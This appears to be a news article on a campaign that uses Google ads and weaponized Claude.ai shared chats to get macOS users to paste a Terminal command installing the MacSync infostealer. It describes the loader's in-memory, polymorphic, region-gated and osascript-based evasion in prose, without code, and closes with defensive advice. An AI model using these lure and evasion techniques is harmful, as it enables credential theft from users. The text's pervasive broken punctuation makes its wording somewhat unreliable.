Technology

Hackers abuse Google ads and Claude.ai to push Mac malware

Claude.ai shared – A malvertising campaign targets macOS users via Google ads and weaponized Claude shared chats to install malware and steal browser data.

One of the more troubling shifts in macOS malware delivery is happening quietly: attackers are using Google Ads and legitimate Claude.ai shared chats to lure people into running commands that install malware.

The campaign targets users who search for phrases such as “Claude mac download.” Instead of steering victims to a fake download page. the sponsored results can appear to point to the real claude.ai domain.. But the instructions embedded in weaponized shared chats tell users what to paste into Terminal. where the command chain ultimately downloads and executes malicious code on their Mac.

The activity was identified by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn.. He pointed to a specific Claude.ai shared chat that presents itself as an official “Claude Code on Mac” installation guide. complete with an attribution to “Apple Support.” While it looks like a helpful setup walkthrough. the steps guide users through opening Terminal and pasting a command that silently retrieves and runs malware.

While attempting to verify the report. it was also found that a second Claude shared chat carried out the same overall attack using different infrastructure.. The two chats used an identical social-engineering pattern. but they differed in the domains referenced and the payloads delivered. indicating that the operators were running parallel versions to keep the campaign resilient.

The shared chats were publicly accessible at the time of reporting, and the key lure remained the same: a “legitimate” Claude interface used to deliver an installation-style prompt that leads to code execution on macOS.

For the Albayrak-identified variant. the base64-encoded instructions in the shared chat were designed to fetch an encoded shell script from attacker-controlled domains seen in security telemetry.. Another variant observed in the separate investigation fetched a different shell-stage file from a different domain. with the overall mechanism still aimed at moving from “paste this command” to “run this silently.”

That next-stage loader is described as a Gunzip-compressed shell script that executes from memory rather than leaving a clear application or traditional binary trail on disk.. Adding to the evasion, the infrastructure served a uniquely obfuscated payload on each request, a behavior known as polymorphic delivery.. The point is to make it harder for security tools to rely on known hashes or signatures for detection.

In one observed variant, the script includes a region-based gate before it proceeds.. It checks whether the machine has Russian or CIS-region keyboard input sources configured. and if that condition is met it exits early.. On its way out. it sends a quiet status ping back to the attackers. effectively signaling which systems passed the first filter.

If the machine passes that check. the script then collects information such as the victim’s external IP address. hostname. OS version. and keyboard locale. and sends it back to the attacker.. This kind of pre-delivery profiling suggests the operators are not simply running a broad spray; they appear to be selecting targets based on system characteristics before proceeding.

After the profiling step, the malware pulls a second-stage payload and executes it via osascript, leveraging macOS’s built-in scripting engine. That choice is significant: it can enable remote code execution while avoiding the need to drop a conventional app or binary file.

The variant described by Albayrak is reported to skip the profiling steps and move directly toward execution.. Instead of focusing first on selecting targets. it harvests browser credentials. cookies. and macOS Keychain contents. then packages that information and exfiltrates it back to the attacker.. Albayrak identified this as a variant of the MacSync macOS infostealer. reinforcing the impression of a mature credential-theft operation behind the campaign.

The domains referenced in the shared chats were not static. In the case of the briskinternet domain shown in the Albayrak-linked variant, it appeared to be down at the time of writing, underscoring how attacker-controlled infrastructure can change quickly even during an active operation.

Malvertising has increasingly been used as a delivery mechanism for malware. and this campaign fits that pattern while also flipping a common expectation.. In earlier similar incidents. the visible problem for users was typically a fake destination domain—an ad would look credible. but the link would lead to a lookalike phishing site.. Here, there is no obvious counterfeit domain to spot in the ad itself.

Both Google Ads observed in this campaign point to Anthropic’s real domain. claude.ai. because the malicious content is embedded inside the platform’s own shared chat feature.. In other words. the “destination” in the ad is genuine. but the content presented within that legitimate environment is weaponized to drive victims into executing commands.

It is not the first time attackers have abused shared chat features from AI platforms. In December, similar reporting described campaigns targeting ChatGPT and Grok users in a comparable way.

Security guidance from the reporting emphasized practical steps: users should navigate directly to claude.ai for downloading the native Claude app rather than relying on sponsored search results.. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface.

More broadly, it remains a strong rule of thumb to treat any instructions asking you to paste Terminal commands with caution, even when the prompt appears to come from a place that looks official.

Authorities reached out to Anthropic and Google for comment prior to publication, reflecting how this kind of abuse sits at the intersection of ad ecosystems, user trust in legitimate platforms, and the growing misuse of AI-adjacent experiences for social engineering.

For macOS users. the lesson is less about which AI interface the attacker used and more about how quickly “helpful setup instructions” can become a shortcut to execution.. When the next-stage payload runs in memory. changes its delivery shape. and optionally profiles the target before it acts. the safest approach is to avoid running commands that were obtained through a sponsored-result flow or a chat-based installation guide—especially ones attributed to familiar brands or support teams.

macOS malware Google Ads malvertising Claude.ai shared chat credential theft osascript execution polymorphic payload

Secret Link